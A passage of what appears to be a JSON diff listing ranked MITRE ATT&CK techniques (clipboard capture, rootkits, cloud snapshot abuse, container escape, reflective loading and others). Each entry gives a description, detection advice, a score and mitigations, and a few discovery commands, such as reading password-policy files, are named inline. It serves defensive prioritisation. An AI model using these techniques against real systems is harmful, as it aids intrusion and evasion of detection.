"https://attack.mitre.org/techniques/T1120", + "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.", + "score": 0.3135025295238095, + "network_score": 0.2, + "mitigations": [], + "subtechniques": [] + }, + { + "rank": 156, + "tid": "T1115", + "name": "Clipboard Data", + "description": "Adversaries may collect data stored in the clipboard from users copying information within or between applications. \nIn Windows, Applications can access clipboard data by using the Windows API.(Citation: MSDN Clipboard) OSX provides a native command, pbpaste, to grab clipboard contents.(Citation: Operating with EmPyre)", + "url": "https://attack.mitre.org/techniques/T1115", + "detection": "Access to the clipboard is a legitimate function of many applications on an operating system. If an organization chooses to monitor for this behavior, then the data will likely need to be correlated against other suspicious or non-user-driven activity.", + "score": 0.30952380952380953, + "network_score": 0.2, + "mitigations": [], + "subtechniques": [] + }, + { + "rank": 157, + "tid": "T1125", + "name": "Video Capture", + "description": "An adversary can leverage a computer's peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information. Images may also be captured from devices or applications, potentially in specified intervals, in lieu of video files.\nMalware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture video or images. Video or image files may be written to disk and exfiltrated later. This technique differs from Screen Capture due to use of specific devices or applications for video recording rather than capturing the victim's screen.\nIn macOS, there are a few different malware samples that record the user's webcam such as FruitFly and Proton. (Citation: objective-see 2017 review)", + "url": "https://attack.mitre.org/techniques/T1125", + "detection": "Detection of this technique may be difficult due to the various APIs that may be used. Telemetry data regarding API use may not be useful depending on how a system is normally used, but may provide context to other potentially malicious activity occurring on a system.\nBehavior that could indicate technique use include an unknown or unusual process accessing APIs associated with devices or software that interact with the video camera, recording devices, or recording software, and a process periodically writing files to disk that contain video or camera image data.", + "score": 0.3047619047619048, + "process_score": 0.2, + "mitigations": [], + "subtechniques": [] + }, + { + "rank": 158, + "tid": "T1010", + "name": "Application Window Discovery", + "description": "Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used or give context to information collected by a keylogger.", + "url": "https://attack.mitre.org/techniques/T1010", + "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.", + "score": 0.3047619047619048, + "process_score": 0.2, + "mitigations": [], + "subtechniques": [] + }, + { + "rank": 159, + "tid": "T1014", + "name": "Rootkit", + "description": "Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information. (Citation: Symantec Windows Rootkits) \nRootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a hypervisor, Master Boot Record, or System Firmware. (Citation: Wikipedia Rootkit) Rootkits have been seen for Windows, Linux, and Mac OS X systems. (Citation: CrowdStrike Linux Rootkit) (Citation: BlackHat Mac OSX Rootkit)", + "url": "https://attack.mitre.org/techniques/T1014", + "detection": "Some rootkit protections may be built into anti-virus or operating system software. There are dedicated rootkit detection tools that look for specific types of rootkit behavior. Monitor for the existence of unrecognized DLLs, devices, services, and changes to the MBR. (Citation: Wikipedia Rootkit)", + "score": 0.30087447, + "hardware_score": 0.2, + "mitigations": [], + "subtechniques": [] + }, + { + "rank": 160, + "tid": "T1217", + "name": "Browser Bookmark Discovery", + "description": "Adversaries may enumerate browser bookmarks to learn more about compromised hosts. Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.\nBrowser bookmarks may also highlight additional targets after an adversary has access to valid credentials, especially Credentials In Files associated with logins cached by a browser.\nSpecific storage locations vary based on platform and/or application, but browser bookmarks are typically stored in local files/databases.", + "url": "https://attack.mitre.org/techniques/T1217", + "detection": "Monitor processes and command-line arguments for actions that could be taken to gather browser bookmark information. Remote access tools with built-in features may interact directly using APIs to gather information. Information may also be acquired through system management tools such as Windows Management Instrumentation and PowerShell.\nSystem and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Collection and Exfiltration, based on the information obtained.", + "score": 0.30000000000000004, + "process_score": 0.2, + "mitigations": [], + "subtechniques": [] + }, + { + "rank": 161, + "tid": "T1578", + "name": "Modify Cloud Compute Infrastructure", + "description": "An adversary may attempt to modify a cloud account's compute service infrastructure to evade defenses. A modification to the compute service infrastructure can include the creation, deletion, or modification of one or more components such as compute instances, virtual machines, and snapshots.\nPermissions gained from the modification of infrastructure components may bypass restrictions that prevent access to existing infrastructure. Modifying infrastructure components may also allow an adversary to evade detection and remove evidence of their presence.(Citation: Mandiant M-Trends 2020)", + "url": "https://attack.mitre.org/techniques/T1578", + "detection": "Establish centralized logging for the activity of cloud compute infrastructure components. Monitor for suspicious sequences of events, such as the creation of multiple snapshots within a short period of time or the mount of a snapshot to a new instance by a new or unexpected user. To reduce false positives, valid change management procedures could introduce a known identifier that is logged with the change (e.g., tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones.", + "score": 0.28571428571428575, + "mitigations": [ + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + }, + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + } + ], + "subtechniques": [ + { + "tid": "T1578.001", + "name": "Modify Cloud Compute Infrastructure: Create Snapshot", + "description": "An adversary may create a snapshot or data backup within a cloud account to evade defenses. A snapshot is a point-in-time copy of an existing cloud compute component such as a virtual machine (VM), virtual hard drive, or volume. An adversary may leverage permissions to create a snapshot in order to bypass restrictions that prevent access to existing compute service infrastructure, unlike in Revert Cloud Instance where an adversary may revert to a snapshot to evade detection and remove evidence of their presence.\nAn adversary may Create Cloud Instance, mount one or more created snapshots to that instance, and then apply a policy that allows the adversary access to the created instance, such as a firewall policy that allows them inbound and outbound SSH access.(Citation: Mandiant M-Trends 2020)", + "url": "https://attack.mitre.org/techniques/T1578/001", + "detection": "The creation of a snapshot is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities such as the creation of one or more snapshots and the restoration of these snapshots by a new user account.\nIn AWS, CloudTrail logs capture the creation of snapshots and all API calls for AWS Backup as events. Using the information collected by CloudTrail, you can determine the request that was made, the IP address from which the request was made, which user made the request, when it was made, and additional details.(Citation: AWS Cloud Trail Backup API).\nIn Azure, the creation of a snapshot may be captured in Azure activity logs. Backup restoration events can also be detected through Azure Monitor Log Data by creating a custom alert for completed restore jobs.(Citation: Azure - Monitor Logs)\nGoogle's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of the gcloud compute instances create command to create a new VM disk from a snapshot.(Citation: Cloud Audit Logs) It is also possible to detect the usage of the GCP API with the \"sourceSnapshot\": parameter pointed to \"global/snapshots/[BOOT_SNAPSHOT_NAME].(Citation: GCP - Creating and Starting a VM)", + "mitigations": [ + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + }, + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + } + ] + }, + { + "tid": "T1578.002", + "name": "Modify Cloud Compute Infrastructure: Create Cloud Instance", + "description": "An adversary may create a new instance or virtual machine (VM) within the compute service of a cloud account to evade defenses. Creating a new instance may allow an adversary to bypass firewall rules and permissions that exist on instances currently residing within an account. An adversary may Create Snapshot of one or more volumes in an account, create a new instance, mount the snapshots, and then apply a less restrictive security policy to collect Data from Local System or for Remote Data Staging.(Citation: Mandiant M-Trends 2020)\nCreating a new instance may also allow an adversary to carry out malicious activity within an environment without affecting the execution of current running instances.", + "url": "https://attack.mitre.org/techniques/T1578/002", + "detection": "The creation of a new instance or VM is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, the creation of an instance by a new user account or the unexpected creation of one or more snapshots followed by the creation of an instance may indicate suspicious activity.\nIn AWS, CloudTrail logs capture the creation of an instance in the RunInstances event, and in Azure the creation of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of gcloud compute instances create to create a VM.(Citation: Cloud Audit Logs)", + "mitigations": [ + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + }, + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + } + ] + }, + { + "tid": "T1578.003", + "name": "Modify Cloud Compute Infrastructure: Delete Cloud Instance", + "description": "An adversary may delete a cloud instance after they have performed malicious activities in an attempt to evade detection and remove evidence of their presence. Deleting an instance or virtual machine can remove valuable forensic artifacts and other evidence of suspicious behavior if the instance is not recoverable.\nAn adversary may also Create Cloud Instance and later terminate the instance after achieving their objectives.(Citation: Mandiant M-Trends 2020)", + "url": "https://attack.mitre.org/techniques/T1578/003", + "detection": "The deletion of a new instance or virtual machine is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, detecting a sequence of events such as the creation of an instance, mounting of a snapshot to that instance, and deletion of that instance by a new user account may indicate suspicious activity.\nIn AWS, CloudTrail logs capture the deletion of an instance in the TerminateInstances event, and in Azure the deletion of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of gcloud compute instances delete to delete a VM.(Citation: Cloud Audit Logs)", + "mitigations": [ + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + }, + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + } + ] + }, + { + "tid": "T1578.004", + "name": "Modify Cloud Compute Infrastructure: Revert Cloud Instance", + "description": "An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data storage snapshots through the cloud management dashboard or cloud APIs.\nAnother variation of this technique is to utilize temporary storage attached to the compute instance. Most cloud providers provide various types of storage including persistent, local, and/or ephemeral, with the ephemeral types often reset upon stop/restart of the VM.(Citation: Tech Republic - Restore AWS Snapshots)(Citation: Google - Restore Cloud Snapshot)", + "url": "https://attack.mitre.org/techniques/T1578/004", + "detection": "Establish centralized logging of instance activity, which can be used to monitor and review system events even after reverting to a snapshot, rolling back changes, or changing persistence/type of storage. Monitor specifically for events related to snapshots and rollbacks and VM configuration changes, that are occurring outside of normal activity. To reduce false positives, valid change management procedures could introduce a known identifier that is logged with the change (e.g., tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones.", + "mitigations": [] + } + ] + }, + { + "rank": 162, + "tid": "T1529", + "name": "System Shutdown/Reboot", + "description": "Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.(Citation: Microsoft Shutdown Oct 2017) Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.\nAdversaries may attempt to shutdown/reboot a system after impacting it in other ways, such as Disk Structure Wipe or Inhibit System Recovery, to hasten the intended effects on system availability.(Citation: Talos Nyetya June 2017)(Citation: Talos Olympic Destroyer 2018)", + "url": "https://attack.mitre.org/techniques/T1529", + "detection": "Use process monitoring to monitor the execution and command line parameters of binaries involved in shutting down or rebooting systems. Windows event logs may also designate activity associated with a shutdown/reboot, ex. Event ID 1074 and 6006.", + "score": 0.2690476190476191, + "hardware_score": 0.2, + "mitigations": [], + "subtechniques": [] + }, + { + "rank": 163, + "tid": "T1200", + "name": "Hardware Additions", + "description": "Adversaries may introduce computer accessories, computers, or networking hardware into a system or network that can be used as a vector to gain access. While public references of usage by threat actors are scarce, many red teams/penetration testers leverage hardware additions for initial access. Commercial and open source products can be leveraged with capabilities such as passive network tapping (Citation: Ossmann Star Feb 2011), network traffic modification (i.e. Adversary-in-the-Middle) (Citation: Aleks Weapons Nov 2015), keystroke injection (Citation: Hak5 RubberDuck Dec 2016), kernel memory reading via DMA (Citation: Frisk DMA August 2016), addition of new wireless access to an existing network (Citation: McMillan Pwn March 2012), and others.", + "url": "https://attack.mitre.org/techniques/T1200", + "detection": "Asset management systems may help with the detection of computer systems or network devices that should not exist on a network. \nEndpoint sensors may be able to detect the addition of hardware via USB, Thunderbolt, and other external device communication ports.", + "score": 0.26285879714285715, + "mitigations": [ + { + "mid": "M1034", + "name": "Limit Hardware Installation", + "description": "Block users or groups from installing or using unapproved hardware on systems, including USB devices.", + "url": "https://attack.mitre.org/mitigations/M1034" + }, + { + "mid": "M1035", + "name": "Limit Access to Resource Over Network", + "description": "Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.", + "url": "https://attack.mitre.org/mitigations/M1035" + } + ], + "subtechniques": [] + }, + { + "rank": 164, + "tid": "T1597", + "name": "Search Closed Sources", + "description": "Adversaries may search and gather information about victims from closed sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data.(Citation: D3Secutrity CTI Feeds) Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.(Citation: ZDNET Selling Data)\nAdversaries may search in different closed databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: Phishing for Information or Search Open Websites/Domains), establishing operational resources (ex: Develop Capabilities or Obtain Capabilities), and/or initial access (ex: External Remote Services or Valid Accounts).", + "url": "https://attack.mitre.org/techniques/T1597", + "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "score": 0.2599, + "file_score": 0.2, + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ], + "subtechniques": [ + { + "tid": "T1597.001", + "name": "Search Closed Sources: Threat Intel Vendors", + "description": "Adversaries may search private data from threat intelligence vendors for information that can be used during targeting. Threat intelligence vendors may offer paid feeds or portals that offer more data than what is publicly reported. Although sensitive details (such as customer names and other identifiers) may be redacted, this information may contain trends regarding breaches such as target industries, attribution claims, and successful TTPs/countermeasures.(Citation: D3Secutrity CTI Feeds)\nAdversaries may search in private threat intelligence vendor data to gather actionable information. Threat actors may seek information/indicators gathered about their own campaigns, as well as those conducted by other adversaries that may align with their target industries, capabilities/objectives, or other operational concerns. Information reported by vendors may also reveal opportunities other forms of reconnaissance (ex: Search Open Websites/Domains), establishing operational resources (ex: Develop Capabilities or Obtain Capabilities), and/or initial access (ex: Exploit Public-Facing Application or External Remote Services).", + "url": "https://attack.mitre.org/techniques/T1597/001", + "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1597.002", + "name": "Search Closed Sources: Purchase Technical Data", + "description": "Adversaries may purchase technical information about victims that can be used during targeting. Information about victims may be available for purchase within reputable private sources and databases, such as paid subscriptions to feeds of scan databases or other data aggregation services. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.\nAdversaries may purchase information about their already identified targets, or use purchased data to discover opportunities for successful breaches. Threat actors may gather various technical details from purchased data, including but not limited to employee contact information, credentials, or specifics regarding a victim’s infrastructure.(Citation: ZDNET Selling Data) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: Phishing for Information or Search Open Websites/Domains), establishing operational resources (ex: Develop Capabilities or Obtain Capabilities), and/or initial access (ex: External Remote Services or Valid Accounts).", + "url": "https://attack.mitre.org/techniques/T1597/002", + "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + } + ] + }, + { + "rank": 165, + "tid": "T1580", + "name": "Cloud Infrastructure Discovery", + "description": "An adversary may attempt to discover resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.\nCloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a DescribeInstances API within the Amazon EC2 API that can return information about one or more instances within an account, the ListBuckets API that returns a list of all buckets owned by the authenticated sender of the request, or the GetPublicAccessBlock API to retrieve access block configuration for a bucket (Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block). \nSimilarly, GCP's Cloud SDK CLI provides the gcloud compute instances list command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command az vm list lists details of virtual machines.(Citation: Microsoft AZ CLI)\nAn adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020)An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as DescribeDBInstances to determine size, owner, permissions, and network ACLs of database resources. (Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in Cloud Service Discovery, this technique focuses on the discovery of components of the provided services rather than the services themselves.", + "url": "https://attack.mitre.org/techniques/T1580", + "detection": "Establish centralized logging for the activity of cloud infrastructure components. Monitor logs for actions that could be taken to gather information about cloud infrastructure, including the use of discovery API calls by new or unexpected users. To reduce false positives, valid change management procedures could introduce a known identifier that is logged with the change (e.g., tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones.", + "score": 0.2238095238095238, + "mitigations": [ + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + } + ], + "subtechniques": [] + }, + { + "rank": 166, + "tid": "T1201", + "name": "Password Policy Discovery", + "description": "Adversaries may attempt to access detailed information about the password policy used within an enterprise network or cloud environment. Password policies are a way to enforce complex passwords that are difficult to guess or crack through Brute Force. This information may help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts).\nPassword policies can be set and discovered on Windows, Linux, and macOS systems via various command shell utilities such as net accounts (/domain), Get-ADDefaultDomainPasswordPolicy, chage -l , cat /etc/pam.d/common-password, and pwpolicy getaccountpolicies (Citation: Superuser Linux Password Policies) (Citation: Jamf User Password Policies).\nPassword policies can be discovered in cloud environments using available APIs such as GetAccountPasswordPolicy in AWS (Citation: AWS GetPasswordPolicy).", + "url": "https://attack.mitre.org/techniques/T1201", + "detection": "Monitor logs and processes for tools and command line arguments that may indicate they're being used for password policy discovery. Correlate that activity with other suspicious activity from the originating system to reduce potential false positives from valid user or administrator activity. Adversaries will likely attempt to find the password policy early in an operation and the activity is likely to happen with other Discovery activity.", + "score": 0.21064284952380952, + "mitigations": [ + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + } + ], + "subtechniques": [] + }, + { + "rank": 167, + "tid": "T1611", + "name": "Escape to Host", + "description": "Adversaries may break out of a container to gain access to the underlying host. This can allow an adversary access to other containerized resources from the host level or to the host itself. In principle, containerized resources should provide a clear separation of application functionality and be isolated from the host environment.(Citation: Docker Overview)\nThere are multiple ways an adversary may escape to a host environment. Examples include creating a container configured to mount the host’s filesystem using the bind parameter, which allows the adversary to drop payloads and execute control utilities such as cron on the host, or utilizing a privileged container to run commands on the underlying host.(Citation: Docker Bind Mounts)(Citation: Trend Micro Privileged Container)(Citation: Intezer Doki July 20) Adversaries may also escape via Exploitation for Privilege Escalation, such as exploiting vulnerabilities in global symbolic links in order to access the root directory of a host machine.(Citation: Windows Server Containers Are Open)\nGaining access to the host may provide the adversary with the opportunity to achieve follow-on objectives, such as establishing persistence, moving laterally within the environment, or setting up a command and control channel on the host.", + "url": "https://attack.mitre.org/techniques/T1611", + "detection": "Monitor for the deployment of suspicious or unknown container images and pods in your environment, particularly containers running as root. Additionally, monitor for unexpected usage of syscalls such as mount (as well as resulting process activity) that may indicate an attempt to escape from a privileged container to host. In Kubernetes, monitor for cluster-level events associated with changing containers' volume configurations.", + "score": 0.1, + "mitigations": [ + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + }, + { + "mid": "M1048", + "name": "Application Isolation and Sandboxing", + "description": "Restrict execution of code to a virtual environment on or in transit to an endpoint system.", + "url": "https://attack.mitre.org/mitigations/M1048" + } + ], + "subtechniques": [] + }, + { + "rank": 168, + "tid": "T1620", + "name": "Reflective Code Loading", + "description": "Adversaries may reflectively load code into a process in order to conceal the execution of malicious payloads. Reflective loading involves allocating then executing payloads directly within the memory of the process, vice creating a thread or process backed by a file path on disk. Reflectively loaded payloads may be compiled binaries, anonymous files (only present in RAM), or just snubs of fileless executable code (ex: position-independent shellcode).(Citation: Introducing Donut)(Citation: S1 Custom Shellcode Tool)(Citation: Stuart ELF Memory)(Citation: 00sec Droppers)(Citation: Mandiant BYOL)\nReflective code injection is very similar to Process Injection except that the “injection” loads code into the processes’ own memory instead of that of a separate process. Reflective loading may evade process-based detections since the execution of the arbitrary code may be masked within a legitimate or otherwise benign process. Reflectively loading payloads directly into memory may also avoid creating files or other artifacts on disk, while also enabling malware to keep these payloads encrypted (or otherwise obfuscated) until execution.(Citation: Stuart ELF Memory)(Citation: 00sec Droppers)(Citation: Intezer ACBackdoor)(Citation: S1 Old Rat New Tricks)", + "url": "https://attack.mitre.org/techniques/T1620", + "detection": "Monitor for code artifacts associated with reflectively loading code, such as the abuse of .NET functions such as Assembly.Load() and Native API functions such as CreateThread(), memfd_create(), execve(), and/or execveat().(Citation: 00sec Droppers)(Citation: S1 Old Rat New Tricks)\nMonitor for artifacts of abnormal process execution. For example, a common signature related to reflective code loading on Windows is mechanisms related to the .NET Common Language Runtime (CLR) -- such as mscor.dll, mscoree.dll, and clr.dll -- loading into abnormal processes (such as notepad.exe). Similarly, AMSI / ETW traces can be used to identify signs of arbitrary code execution from within the memory of potentially compromised processes.(Citation: MDSec Detecting DOTNET)(Citation: Introducing Donut)\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ", + "score": 0.1, + "mitigations": [], + "subtechniques": [] + }, + { + "rank": 169, + "tid": "T1619", + "name": "Cloud Storage Object Discovery", + "description": "Adversaries may enumerate objects in cloud storage infrastructure. Adversaries may use this information during automated discovery to shape follow-on behaviors, including requesting all or specific objects from cloud storage. Similar to File and Directory Discovery on a local host, after identifying available storage services (i.e. Cloud Infrastructure Discovery) adversaries may access the contents/objects stored in cloud infrastructure.\nCloud service providers offer APIs allowing users to enumerate objects stored within cloud storage. Examples include ListObjectsV2 in AWS (Citation: ListObjectsV2) and List Blobs in Azure(Citation: List Blobs) .", + "url": "https://attack.mitre.org/techniques/T1619", + "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Collection and Exfiltration, based on the information obtained. \nMonitor cloud logs for API calls used for file or object enumeration for unusual activity. ", + "score": 0.1, + "mitigations": [ + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + } + ], + "subtechniques": [] + }, + { + "rank": 170, + "tid": "T1609", + "name": "Container Administration Command", + "description": "Adversaries may abuse a container administration service to execute commands within a container. A container administration service such as the Docker daemon, the Kubernetes API server, or the kubelet may allow remote management of containers within an environment.(Citation: Docker Daemon CLI)(Citation: Kubernetes API)(Citation: Kubernetes Kubelet)\nIn Docker, adversaries may specify an entrypoint during container deployment that executes a script or command, or they may use a command such as docker exec to execute a command within a running container.(Citation: Docker Entrypoint)(Citation: Docker Exec) In Kubernetes, if an adversary has sufficient permissions, they may gain remote execution in a container in the cluster via interaction with the Kubernetes API server, the kubelet, or by running a command such as kubectl exec.(Citation: Kubectl Exec Get Shell)", + "url": "https://attack.mitre.org/techniques/T1609", + "detection": "Container administration service activities and executed commands can be captured through logging of process execution with command-line arguments on the container and the underlying host. In Docker, the daemon log provides insight into events at the daemon and container service level. Kubernetes system component logs may also detect activities running in and out of containers in the cluster. ", + "score": 0.1, + "mitigations": [ + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1035", + "name": "Limit Access to Resource Over Network", + "description": "Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.", + "url": "https://attack.mitre.org/mitigations/M1035" + }, + { + "mid": "M1038", + "name": "Execution Prevention", + "description": "Block execution of code on a system through application control, and/or script blocking.", + "url": "https://attack.mitre.org/mitigations/M1038" + } + ], + "subtechniques": [] + }, + { + "rank": 171, + "tid": "T1613", + "name": "Container and Resource Discovery", + "description": "Adversaries may attempt to discover containers and other resources that are available within a containers environment. Other resources may include images, deployments, pods, nodes, and other information such as the status of a cluster.\nThese resources can be viewed within web applications such as the Kubernetes dashboard or can be queried via the Docker and Kubernetes APIs.(Citation: Docker API)(Citation: Kubernetes API) In Docker, logs may leak information about the environment, such as the environment’s configuration, which services are available, and what cloud provider the victim may be utilizing. The discovery of these resources may inform an adversary’s next steps in the environment, such as how to perform lateral movement and which methods to utilize for execution. ", + "url": "https://attack.mitre.org/techniques/T1613", + "detection": "Establish centralized logging for the activity of container and Kubernetes cluster components. This can be done by deploying logging agents on Kubernetes nodes and retrieving logs from sidecar proxies for application pods to detect malicious activity at the cluster level.\nMonitor logs for actions that could be taken to gather information about container infrastructure, including the use of discovery API calls by new or unexpected users. Monitor account activity logs to see actions performed and activity associated with the Kubernetes dashboard and other web applications. ", + "score": 0.1, + "mitigations": [ + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + }, + { + "mid": "M1030", + "name": "Network Segmentation", + "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.", + "url": "https://attack.mitre.org/mitigations/M1030" + }, + { + "mid": "M1035", + "name": "Limit Access to Resource Over Network", + "description": "Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.", + "url": "https://attack.mitre.org/mitigations/M1035" + } + ], + "subtechniques": [] + }, + { + "rank": 172, + "tid": "T1610", + "name": "Deploy Container", + "description": "Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment.\nContainers can be deployed by various means, such as via Docker's create and start APIs or via a web application such as the Kubernetes dashboard or Kubeflow.(Citation: Docker Containers API)(Citation: Kubernetes Dashboard)(Citation: Kubeflow Pipelines) Adversaries may deploy containers based on retrieved or built malicious images or from benign images that download and execute malicious payloads at runtime.(Citation: Aqua Build Images on Hosts)", + "url": "https://attack.mitre.org/techniques/T1610", + "detection": "Monitor for suspicious or unknown container images and pods in your environment. Deploy logging agents on Kubernetes nodes and retrieve logs from sidecar proxies 